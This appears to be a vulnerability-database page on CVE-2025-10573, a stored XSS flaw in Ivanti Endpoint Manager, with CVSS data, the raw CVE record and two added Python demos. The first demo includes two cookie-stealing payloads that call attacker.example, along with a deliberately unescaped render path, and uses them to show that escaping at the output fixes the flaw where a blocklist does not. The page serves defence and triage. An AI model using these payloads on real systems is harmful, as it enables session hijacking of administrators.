CVE-2025-10573
Title: CVE-2025-10573 (the record carries no separate title)
Description
Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required.
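The description names the vulnerability class and the trust boundary it crosses (an unauthenticated write path, an administrator read path) but not the affected field or page. The following is an added illustration written for this page, not Ivanti code and not a reproduction of the EPM flaw: a hypothetical device-inventory store with an unauthenticated write path, three ways of rendering it into an administrator page, and a parser-based check for what a browser would actually execute. The payloads, the `DeviceInventory` class and the `attacker.example` host are constructed for the demo.

```python
"""Stored-XSS data flow: unauthenticated write, administrator read, and the fix at the output sink."""
import html
import re
from html.parser import HTMLParser
from typing import Dict, List

# Constructed payloads for this demo (hypothetical; the advisory names no field or payload).
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
HANDLER_PAYLOAD = "<img src=x onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">"


class ActiveMarkupDetector(HTMLParser):
    """Parse rendered HTML and record what a browser would execute: <script> elements and
    on* event-handler attributes. Escaped text such as '&lt;script&gt;' never reaches
    handle_starttag, so it is (correctly) not flagged."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.findings.append("<script>")
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"<{tag} {name}>")


def active_markup(page: str) -> List[str]:
    """Return the executable markup found in a rendered page (empty list means none)."""
    detector = ActiveMarkupDetector()
    detector.feed(page)
    detector.close()
    return detector.findings


class DeviceInventory:
    """Hypothetical inventory: an unauthenticated enrolment endpoint writes device names,
    an administrator later views them in the console."""

    def __init__(self) -> None:
        self._names: List[str] = []

    def submit_unauthenticated(self, device_name: str) -> None:
        # Write path: no authentication, value stored verbatim (the CWE-79 source).
        self._names.append(device_name)

    def render_admin_page(self, mode: str) -> str:
        # Read path: the page is built inside the administrator's session (the XSS sink).
        cells = []
        for name in self._names:
            if mode == "vulnerable":
                cell = name  # raw interpolation into HTML
            elif mode == "blocklist":
                # Strips one tag shape; an event handler on any other element survives.
                cell = re.sub(r"<script\b.*?</script>", "", name, flags=re.I | re.S)
            elif mode == "escaped":
                cell = html.escape(name, quote=True)  # correct encoding for HTML text context
            else:
                raise ValueError(f"unknown render mode: {mode!r}")
            cells.append(f"<tr><td>{cell}</td></tr>")
        return "<table>" + "".join(cells) + "</table>"


def run_demo() -> Dict[str, List[str]]:
    """Store one benign name and two payloads, then report executable markup per render mode."""
    inv = DeviceInventory()
    inv.submit_unauthenticated("LAPTOP-0042")
    inv.submit_unauthenticated(SCRIPT_PAYLOAD)
    inv.submit_unauthenticated(HANDLER_PAYLOAD)
    return {mode: active_markup(inv.render_admin_page(mode))
            for mode in ("vulnerable", "blocklist", "escaped")}


if __name__ == "__main__":
    for mode, findings in run_demo().items():
        print(f"{mode:11s} -> {findings or 'no executable markup'}")
```

Two practitioner points the demo makes concrete: input-side blocklists are bypassed by any payload shape the list did not anticipate, so the fix belongs at the output sink with encoding chosen for the context the value lands in (`html.escape` is right for HTML text and quoted attribute values, not for a value dropped inside a `<script>` string or a URL); and marking the session cookie HttpOnly would stop this particular cookie-exfiltration payload but not requests the script issues with the administrator's ambient session, which is why a Content-Security-Policy is defence in depth rather than a substitute for the patch.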
Overview
- State: PUBLISHED
- Assigner (CNA): ivanti
- CVSS severity: CRITICAL
- CVSS score: 9.6 / 10
- CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
- Effective score: 9.6 / 10 CRITICAL (source: CNA)
- CWE(s): CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- SSVC (CISA ADP, 2025-12-10): Exploitation none, Automatable no, Technical Impact total
- Reserved: 2025-09-16
- Published: 2025-12-09 15:55 UTC
- Last updated: 2026-02-26 16:57 UTC
- Source: https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2025/10xxx/CVE-2025-10573.json
- Linked Threat: CVE-2025-10573

The vector matches the description: PR:N because the stored input needs no authentication, UI:R because an administrator has to open the page that renders it, and S:C because the script runs in the administrator's browser session rather than in the component that accepted the input. Scope: Changed is what lifts this vector from 8.8 (the same metrics with S:U) to 9.6.
European Union Vulnerability Database (ENISA EUVD)
ENISA's official EU repository for curated vulnerability intelligence. It carries a separate identifier (EUVD-YYYY-NNNN) and often publishes a description and CVSS earlier than NVD does.
- EUVD ID: EUVD-2025-202300
- Assigner: ivanti
- Published: Dec 9, 2025, 3:55:23 PM (15:55:23 UTC per the record)
- Updated: Feb 26, 2026, 4:57:06 PM (16:57:06 UTC per the record)
- EUVD base score (CVSS 3.1): 9.6 / 10, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
- EUVD-reported EPSS: 0.0600
- Vendors: Ivanti
- Products: Endpoint Manager (patch: 2024 SU4 SR1)
- Aliases: GHSA-vc8q-w37r-fmjc
- ENISA description: same text as the CVE description above.
Affected products (1)
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| Ivanti | Endpoint Manager | 2024 SU4 SR1 unaffected; everything else affected (the record sets defaultStatus: affected and lists only the fixed version; the description says "prior to version 2024 SU4 SR1") | — |
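The record gives the fixed release but no version grammar, so an inventory check has to parse EPM version strings itself. The following is an added example written for this page, not Ivanti tooling. It assumes the strings look like the record's own ('<year>', '<year> SU<n>', '<year> SU<n> SR<n>') and that a service release (SR) sits on top of a service update (SU), which sits on top of the yearly release. It deliberately exposes both readings of the record: the description's "prior to 2024 SU4 SR1", and the structured data's defaultStatus: affected with a single unaffected entry, under which a later release such as a hypothetical 2024 SU5 is not attested as fixed. The inventory in the usage block is constructed; only the 2024 branch is named in the advisory, so the 2022 entry is flagged by the "prior to" wording alone.

```python
"""Triage Ivanti EPM version strings against the fixed release named in the CVE record."""
import re
from typing import Dict, List, Tuple

FIXED_VERSION = "2024 SU4 SR1"   # the single 'unaffected' entry in the cvelistV5 record

# Assumed grammar for the version strings: '<year>[ SU<n>][ SR<n>]' (not documented in the record).
_VERSION_RE = re.compile(r"^\s*(\d{4})(?:\s+SU\s*(\d+))?(?:\s+SR\s*(\d+))?\s*$", re.IGNORECASE)


def parse_epm_version(text: str) -> Tuple[int, int, int]:
    """'2024 SU4 SR1' -> (2024, 4, 1); a bare '2024' -> (2024, 0, 0).
    Tuples compare lexicographically, which encodes the assumed SR-on-SU-on-year ordering."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised EPM version string: {text!r}")
    year, su, sr = m.groups()
    return (int(year), int(su or 0), int(sr or 0))


def affected_per_description(version: str) -> bool:
    """Prose reading: anything 'prior to version 2024 SU4 SR1' is affected."""
    return parse_epm_version(version) < parse_epm_version(FIXED_VERSION)


def affected_per_record(version: str) -> bool:
    """Structured reading: defaultStatus 'affected' plus one explicit 'unaffected' version,
    so anything that is not literally 2024 SU4 SR1 is affected, later releases included."""
    return parse_epm_version(version) != parse_epm_version(FIXED_VERSION)


def triage(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Bucket hosts: 'patch' when the prose says affected, 'verify' when only the record's
    strict reading says so (confirm against the vendor advisory), 'ok' when on the fixed release."""
    out: Dict[str, List[str]] = {"patch": [], "verify": [], "ok": []}
    for host, version in inventory.items():
        if affected_per_description(version):
            out["patch"].append(host)
        elif affected_per_record(version):
            out["verify"].append(host)
        else:
            out["ok"].append(host)
    return out


if __name__ == "__main__":
    # Constructed inventory for the demo (not real hosts).
    sample = {
        "epm-core-01": "2024 SU4",
        "epm-core-02": "2024 SU4 SR1",
        "epm-lab": "2022 SU6",
        "epm-test": "2024 SU5",
    }
    for bucket, hosts in triage(sample).items():
        print(f"{bucket:6s}: {', '.join(hosts) or '-'}")
```

The "verify" bucket exists because a CVE record that lists a single unaffected version says nothing about releases after it; for those, the vendor advisory linked under Vendor references is the authority, not the record.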
Remediations (4)
Remediations are stored against the linked Threat row; the list below is deduplicated across both pages. All entries retrieved 2026-05-22 11:37 UTC.
- censys.com: "Vulnerability Description CVE-2025-10573 is a critical (CVSS 9.6) stored Cross-Site Scripting (XSS) vulnerability that allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. This can lead to session hijacking, privilege escalation, and potential compromise of the Ivanti Endpoint Manager (EPM) interface. This vulnerability affects ..."
- thehackernews.com: "Vendors fix critical flaws across Fortinet, Ivanti, and SAP to prevent authentication bypass and remote code execution."
- bleepingcomputer.com: "American IT software company Ivanti warned customers today to patch a newly disclosed vulnerability in its Endpoint Manager (EPM) solution that could allow attackers to execute code remotely."
- rapid7.com: "Due to the unauthenticated nature of this vulnerability, customers are recommended to patch affected instances as soon as possible. Product description Ivanti EPM is endpoint management software used by many organizations for remote administration, vulnerability scanning, and compliance management of user endpoints, among other use cases."
Vendor references (1)
References embedded in the original CVE record by the assigning CNA.
- https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024
Web references (1)
DuckDuckGo results ranked by threat-intel / vendor advisory domains.
- https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 (rapid7:forums.ivanti.com)
Raw JSON
The full cvelistV5 record (CVE-2025-10573.json).
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-10573",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-10T04:57:22.470061Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-26T16:57:06.042Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "affected",
"product": "Endpoint Manager",
"vendor": "Ivanti",
"versions": [
{
"status": "unaffected",
"version": "2024 SU4 SR1",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": " Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required. <br>"
}
],
"value": "Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required."
}
],
"impacts": [
{
"capecId": "CAPEC-592",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-592 Stored XSS"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-09T15:55:23.422Z",
"orgId": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75",
"shortName": "ivanti"
},
"references": [
{
"url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75",
"assignerShortName": "ivanti",
"cveId": "CVE-2025-10573",
"datePublished": "2025-12-09T15:55:23.422Z",
"dateReserved": "2025-09-16T18:01:53.783Z",
"dateUpdated": "2026-02-26T16:57:06.042Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}